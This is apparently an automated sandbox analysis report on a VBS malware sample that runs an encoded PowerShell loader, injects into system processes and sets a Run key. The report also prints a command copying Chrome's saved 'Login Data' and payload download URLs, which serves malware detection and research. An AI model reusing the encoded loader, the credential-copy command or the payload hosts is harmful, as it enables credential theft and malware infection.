Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F20A8 22_2_032F20A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B090 22_2_0323B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F28EC 22_2_032F28EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1FF1 22_2_032F1FF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03246E30 22_2_03246E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032ED616 22_2_032ED616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2EF7 22_2_032F2EF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03220D20 22_2_03220D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F2D07 22_2_032F2D07
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1D55 22_2_032F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F25DD 22_2_032F25DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323841F 22_2_0323841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032ED466 22_2_032ED466
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2D88 22_2_006C2D88
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2D90 22_2_006C2D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C9E60 22_2_006C9E60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C9E5B 22_2_006C9E5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DE61F 22_2_006DE61F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C2FB0 22_2_006C2FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1E9EB150 appears 45 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_1EA296E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_1EA29660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA297A0 NtUnmapViewOfSection,LdrInitializeThunk, 19_2_1EA297A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29780 NtMapViewOfSection,LdrInitializeThunk, 19_2_1EA29780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29710 NtQueryInformationToken,LdrInitializeThunk, 19_2_1EA29710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29540 NtReadFile,LdrInitializeThunk, 19_2_1EA29540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A20 NtResumeThread,LdrInitializeThunk, 19_2_1EA29A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A00 NtProtectVirtualMemory,LdrInitializeThunk, 19_2_1EA29A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A50 NtCreateFile,LdrInitializeThunk, 19_2_1EA29A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA298F0 NtReadVirtualMemory,LdrInitializeThunk, 19_2_1EA298F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_1EA29860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29840 NtDelayExecution,LdrInitializeThunk, 19_2_1EA29840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA299A0 NtCreateSection,LdrInitializeThunk, 19_2_1EA299A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_1EA29910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296D0 NtCreateKey, 19_2_1EA296D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29610 NtEnumerateValueKey, 19_2_1EA29610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29670 NtQueryInformationProcess, 19_2_1EA29670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29650 NtQueryValueKey, 19_2_1EA29650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29FE0 NtCreateMutant, 19_2_1EA29FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29730 NtQueryVirtualMemory, 19_2_1EA29730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A710 NtOpenProcessToken, 19_2_1EA2A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29760 NtOpenProcess, 19_2_1EA29760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A770 NtOpenThread, 19_2_1EA2A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29770 NtSetInformationFile, 19_2_1EA29770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA295F0 NtQueryInformationFile, 19_2_1EA295F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA295D0 NtClose, 19_2_1EA295D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29520 NtWaitForSingleObject, 19_2_1EA29520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2AD30 NtSetContextThread, 19_2_1EA2AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29560 NtWriteFile, 19_2_1EA29560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A80 NtOpenDirectoryObject, 19_2_1EA29A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29A10 NtQuerySection, 19_2_1EA29A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2A3B0 NtGetContextThread, 19_2_1EA2A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29B00 NtSetValueKey, 19_2_1EA29B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA298A0 NtWriteVirtualMemory, 19_2_1EA298A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29820 NtEnumerateKey, 19_2_1EA29820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA2B040 NtSuspendThread, 19_2_1EA2B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA299D0 NtCreateProcessEx, 19_2_1EA299D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA29950 NtQueueApcThread, 19_2_1EA29950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269B00 NtSetValueKey,LdrInitializeThunk, 22_2_03269B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A50 NtCreateFile,LdrInitializeThunk, 22_2_03269A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk, 22_2_03269910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032699A0 NtCreateSection,LdrInitializeThunk, 22_2_032699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269860 NtQuerySystemInformation,LdrInitializeThunk, 22_2_03269860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269840 NtDelayExecution,LdrInitializeThunk, 22_2_03269840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269710 NtQueryInformationToken,LdrInitializeThunk, 22_2_03269710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269770 NtSetInformationFile,LdrInitializeThunk, 22_2_03269770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269780 NtMapViewOfSection,LdrInitializeThunk, 22_2_03269780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269FE0 NtCreateMutant,LdrInitializeThunk, 22_2_03269FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269610 NtEnumerateValueKey,LdrInitializeThunk, 22_2_03269610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk, 22_2_03269660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269650 NtQueryValueKey,LdrInitializeThunk, 22_2_03269650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk, 22_2_032696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032696D0 NtCreateKey,LdrInitializeThunk, 22_2_032696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269560 NtWriteFile,LdrInitializeThunk, 22_2_03269560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269540 NtReadFile,LdrInitializeThunk, 22_2_03269540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032695D0 NtClose,LdrInitializeThunk, 22_2_032695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A3B0 NtGetContextThread, 22_2_0326A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A20 NtResumeThread, 22_2_03269A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A00 NtProtectVirtualMemory, 22_2_03269A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A10 NtQuerySection, 22_2_03269A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269A80 NtOpenDirectoryObject, 22_2_03269A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269950 NtQueueApcThread, 22_2_03269950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032699D0 NtCreateProcessEx, 22_2_032699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269820 NtEnumerateKey, 22_2_03269820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326B040 NtSuspendThread, 22_2_0326B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032698A0 NtWriteVirtualMemory, 22_2_032698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032698F0 NtReadVirtualMemory, 22_2_032698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269730 NtQueryVirtualMemory, 22_2_03269730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A710 NtOpenProcessToken, 22_2_0326A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269760 NtOpenProcess, 22_2_03269760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326A770 NtOpenThread, 22_2_0326A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032697A0 NtUnmapViewOfSection, 22_2_032697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269670 NtQueryInformationProcess, 22_2_03269670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03269520 NtWaitForSingleObject, 22_2_03269520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326AD30 NtSetContextThread, 22_2_0326AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032695F0 NtQueryInformationFile, 22_2_032695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA360 NtCreateFile, 22_2_006DA360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA410 NtReadFile, 22_2_006DA410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA490 NtClose, 22_2_006DA490
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA540 NtAllocateVirtualMemory, 22_2_006DA540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA35D NtCreateFile, 22_2_006DA35D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA48A NtClose, 22_2_006DA48A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA53A NtAllocateVirtualMemory, 22_2_006DA53A
Source: New _Inquiry P.O4622.vbs Initial sample: Strings found which are bigger than 50
Source: New _Inquiry P.O4622.vbs Virustotal: Detection: 8%
Source: New _Inquiry P.O4622.vbs ReversingLabs: Detection: 13%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAd
AAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220121
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\blueb.dat
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@14/16@4/1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.ini
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBMAEEAQwBUAEkARgBFA", "", "", "0")
Source: Yara match File source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493203F push eax; iretd 13_2_04932015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA3D0D1 push ecx; ret 19_2_1EA3D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0327D0D1 push ecx; ret 22_2_0327D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA842 push edx; retf 22_2_006DA843
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DC883 push 00000038h; retf 22_2_006DC88F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C63D7 push 00000019h; ret 22_2_006C63DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD4B5 push eax; ret 22_2_006DD508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD56C push eax; ret 22_2_006DD572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD50B push eax; ret 22_2_006DD572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD502 push eax; ret 22_2_006DD508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006D9FB6 push es; iretd 22_2_006D9FBD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll

Boot Survival

Source: C:\Windows\SysWOW64\svchost.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DDFDTFWP

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE0
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Initial file Initial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://OWANLAB.COM/BIN_DZIINE252.BINHTTPS://GSMSERVICE.TECH/BIN_DZIINE252.BIN
Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE~
Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000006C9904 second address: 00000000006C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000006C9B7E second address: 00000000006C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
